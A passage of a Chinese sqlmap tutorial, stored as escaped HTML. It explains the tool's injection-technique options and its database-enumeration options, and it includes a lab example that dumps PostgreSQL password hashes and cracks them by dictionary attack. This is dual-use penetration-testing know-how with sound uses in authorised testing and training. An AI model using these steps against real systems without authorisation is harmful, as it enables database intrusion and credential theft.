b\u52a0\u53c2\u6570<\/span><span>&#8211;code=200<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;text-only,&#8211;titles<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u4e9b\u65f6\u5019\u7528\u6237\u77e5\u9053\u771f\u6761\u4ef6\u4e0b\u7684\u8fd4\u56de\u9875\u9762\u4e0e\u5047\u6761\u4ef6\u4e0b\u8fd4\u56de\u9875\u9762\u662f\u4e0d\u540c\u4f4d\u7f6e\u5728\u54ea\u91cc\u53ef\u4ee5\u4f7f\u7528<span>&#8211;text-only<\/span><span>\uff08<\/span><span>HTTP<\/span><span>\u54cd\u5e94\u4f53\u4e2d\u4e0d\u540c\uff09<\/span><span>&#8211;titles<\/span><span>\uff08<\/span><span>HTML<\/span><span>\u7684<\/span><span>title<\/span><span>\u6807\u7b7e\u4e2d\u4e0d\u540c\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%85%A5%E6%8A%80%E6%9C%AF\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u5165\u6280\u672f<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B5%8B%E8%AF%95%E6%98%AF%E5%90%A6%E6%98%AF%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;technique<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e2a\u53c2\u6570\u53ef\u4ee5\u6307\u5b9a<span>sqlmap<\/span><span>\u4f7f\u7528\u7684\u63a2\u6d4b\u6280\u672f\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u4f1a\u6d4b\u8bd5\u6240\u6709\u7684\u65b9\u5f0f\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u652f\u6301\u7684\u63a2\u6d4b\u65b9\u5f0f\u5982\u4e0b\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">B:&nbsp;Boolean-based&nbsp;blind&nbsp;SQL&nbsp;injection<span>\uff08\u5e03\u5c14\u578b\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">E:&nbsp;Error-based&nbsp;SQL&nbsp;injection<span>\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">U:&nbsp;UNION&nbsp;query&nbsp;SQL&nbsp;injection<span>\uff08\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">S:&nbsp;Stacked&nbsp;queries&nbsp;SQL&nbsp;injection<span>\uff08\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">T:&nbsp;Time-based&nbsp;blind&nbsp;SQL&nbsp;injection<span>\uff08\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165\uff09<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E5%BB%B6%E8%BF%9F%E6%B3%A8%E5%85%A5%E7%9A%84%E6%97%B6%E9%97%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--time-sec<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f7f\u7528\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528<span>--time-sec<\/span><span>\u53c2\u6570\u8bbe\u5b9a\u5ef6\u65f6\u65f6\u95f4\uff0c\u9ed8\u8ba4\u662f<\/span><span>5<\/span><span>\u79d2\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E5%AD%97%E6%AE%B5%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--union-cols<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p 
class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u6d4b\u8bd5<\/span><span>UNION<\/span><span>\u67e5\u8be2\u6ce8\u5165\u4f1a\u6d4b\u8bd5<\/span><span>1-10<\/span><span>\u4e2a\u5b57\u6bb5\u6570\uff0c\u5f53<\/span><span>&#8211;level<\/span><span>\u4e3a<\/span><span>5<\/span><span>\u7684\u65f6\u5019\u4ed6\u4f1a\u589e\u52a0\u6d4b\u8bd5\u5230<\/span><span>50<\/span><span>\u4e2a\u5b57\u6bb5\u6570\u3002\u8bbe\u5b9a<\/span><span>&#8211;union-cols<\/span><span>\u7684\u503c\u5e94\u8be5\u662f\u4e00\u6bb5\u6574\u6570\uff0c\u5982\uff1a<\/span><span>12-16<\/span><span>\uff0c\u662f\u6d4b\u8bd5<\/span><span>12-16<\/span><span>\u4e2a\u5b57\u6bb5\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E5%AD%97%E7%AC%A6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;union-char<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u9488\u5bf9<\/span><span>UNION<\/span><span>\u67e5\u8be2\u7684\u6ce8\u5165\u4f1a\u4f7f\u7528<\/span><span>NULL<\/span><span>\u5b57\u7b26\uff0c\u4f46\u662f\u6709\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u9020\u6210\u9875\u9762\u8fd4\u56de\u5931\u8d25\uff0c\u800c\u4e00\u4e2a\u968f\u673a\u6574\u6570\u662f\u6210\u529f\u7684\uff0c\u8fd9\u65f6\u4f60\u53ef\u4ee5\u7528<\/span><span>--union-char<\/span><span>\u6307\u5b9a<\/span><span>UNION<\/span><span>\u67e5\u8be2\u7684\u5b57\u7b26\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E9%98%B6SQL%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4e8c\u9636SQL\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--second-order<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u4e9b\u65f6\u5019\u6ce8\u5165\u70b9\u8f93\u5165\u7684\u6570\u636e\u770b\u8fd4\u56de\u7ed3\u679c\u7684\u65f6\u5019\u5e76\u4e0d\u662f\u5f53\u524d\u7684\u9875\u9762\uff0c\u800c\u662f\u53e6\u5916\u7684\u4e00\u4e2a\u9875\u9762\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u4f60\u6307\u5b9a\u5230\u54ea\u4e2a\u9875\u9762\u83b7\u53d6\u54cd\u5e94\u5224\u65ad\u771f\u5047\u3002<span>--second-order<\/span><span>\u540e\u9762\u8ddf\u4e00\u4e2a\u5224\u65ad\u9875\u9762\u7684<\/span><span>URL<\/span><span>\u5730\u5740\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" 
id=\"%E5%88%97%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5217\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%A0%87%E5%BF%97\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6807\u5fd7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-b,--banner<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5927\u591a\u6570\u7684\u6570\u636e\u5e93\u7cfb\u7edf\u90fd\u6709\u4e00\u4e2a\u51fd\u6570\u53ef\u4ee5\u8fd4\u56de\u6570\u636e\u5e93\u7684\u7248\u672c\u53f7\uff0c\u901a\u5e38\u8fd9\u4e2a\u51fd\u6570\u662f<span>version()<\/span><span>\u6216\u8005\u53d8\u91cf<\/span><span>@@version<\/span><span>\uff0c\u8fd9\u4e3b\u8981\u53d6\u51b3\u4e8e\u662f\u4ec0\u4e48\u6570\u636e\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%94%A8%E6%88%B7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u7528\u6237<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--current-user<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u5927\u591a\u6570\u6570\u636e\u5e93\u4e2d\u53ef\u4ee5\u83b7\u53d6\u5230\u7ba1\u7406\u6570\u636e\u7684\u7528\u6237\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5f53\u524d\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--current-db<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd4\u56de\u5f53\u524d\u8fde\u63a5\u7684\u6570\u636e\u5e93\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E6%98%AF%E5%90%A6%E4%B8%BA%E7%AE%A1%E7%90%86%E7%94%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528\u6237<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--is-dba<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5224\u65ad\u5f53\u524d\u7684\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\uff0c\u662f\u7684\u8bdd\u4f1a\u8fd4\u56de<span>True<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%94%A8%E6%88%B7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;users<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5c31\u53ef\u4ee5\u5217\u51fa\u6240\u6709\u7ba1\u7406\u7528\u6237\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E5%B9%B6%E7%A0%B4%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E7%9A%84hash\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;passwords<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u7528\u6237\u5bc6\u7801\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c<span>sqlmap<\/span><span>\u4f1a\u5148\u5217\u4e3e\u51fa\u7528\u6237\uff0c\u7136\u540e\u5217\u51fa<\/span><span>hash<\/span><span>\uff0c\u5e76\u5c1d\u8bd5\u7834\u89e3\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1&#8221;&nbsp;&#8211;passwords&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;PostgreSQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:38]&nbsp;[INFO]&nbsp;fetching&nbsp;database&nbsp;users&nbsp;password&nbsp;hashes<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;use&nbsp;dictionary&nbsp;attack&nbsp;on&nbsp;retrieved&nbsp;password&nbsp;hashes?&nbsp;[Y\/n\/q]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:42]&nbsp;[INFO]&nbsp;using&nbsp;hash&nbsp;method:&nbsp;&#8216;postgres_passwd&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">what&#8217;s&nbsp;the&nbsp;dictionary&#8217;s&nbsp;location?&nbsp;[\/software\/sqlmap\/txt\/wordlist.txt]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:46]&nbsp;[INFO]&nbsp;loading&nbsp;dictionary&nbsp;from:&nbsp;&#8216;\/software\/sqlmap\/txt\/wordlist.txt&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;use&nbsp;common&nbsp;password&nbsp;suffixes?&nbsp;(slow!)&nbsp;[y\/N]&nbsp;n<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:48]&nbsp;[INFO]&nbsp;starting&nbsp;dictionary&nbsp;attack&nbsp;(postgres_passwd)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:49]&nbsp;[INFO]&nbsp;found:&nbsp;&#8216;testpass&#8217;&nbsp;for&nbsp;user:&nbsp;&#8216;testuser&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;found:&nbsp;&#8216;testpass&#8217;&nbsp;for&nbsp;user:&nbsp;&#8216;postgres&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">database&nbsp;management&nbsp;system&nbsp;users&nbsp;password&nbsp;hashes:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;postgres&nbsp;[1]:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;password&nbsp;hash:&nbsp;md5d7d880f96044b72d0bba108ace96d1e4<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;clear-text&nbsp;password:&nbsp;testpass<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;testuser&nbsp;[1]:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;password&nbsp;hash:&nbsp;md599e5ea7a6f7c3269995cba3927fd0093<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;clear-text&nbsp;password:&nbsp;testpass<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53ef\u4ee5\u770b\u5230<span>sqlmap<\/span><span>\u4e0d\u4ec5\u5217\u51fa\u6570\u636e\u5e93\u7684\u7528\u6237\u8ddf\u5bc6\u7801\uff0c\u540c\u65f6\u4e5f\u8bc6\u522b\u51fa\u662f<\/span><span>PostgreSQL<\/span><span>\u6570\u636e\u5e93\uff0c\u5e76\u8be2\u95ee\u7528\u6237\u662f\u5426\u91c7\u7528\u5b57\u5178\u7206\u7834\u7684\u65b9\u5f0f\u8fdb\u884c\u7834\u89e3\uff0c\u8fd9\u4e2a\u7206\u7834\u5df2\u7ecf\u652f\u6301<\/span><span>Oracle<\/span><span>\u548c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e5f\u53ef\u4ee5\u63d0\u4f9b<span>-U<\/span><span>\u53c2\u6570\u6765\u6307\u5b9a\u7206\u7834\u54ea\u4e2a\u7528\u6237\u7684<\/span><span>hash<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;privileges<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u6743\u9650\uff0c<span>sqlmap<\/span><span>\u5c06\u4f1a\u544a\u8bc9\u4f60\u54ea\u4e2a\u662f\u6570\u636e\u5e93\u7684\u8d85\u7ea7\u7ba1\u7406\u5458\u3002\u4e5f\u53ef\u4ee5\u7528<\/span><span>-U<\/span><span>\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u6743\u9650\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E8%A7%92%E8%89%B2\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;roles<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u89d2\u8272\uff0c\u4e5f\u53ef\u4ee5\u7528<span>-U<\/span><span>\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u89d2\u8272\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 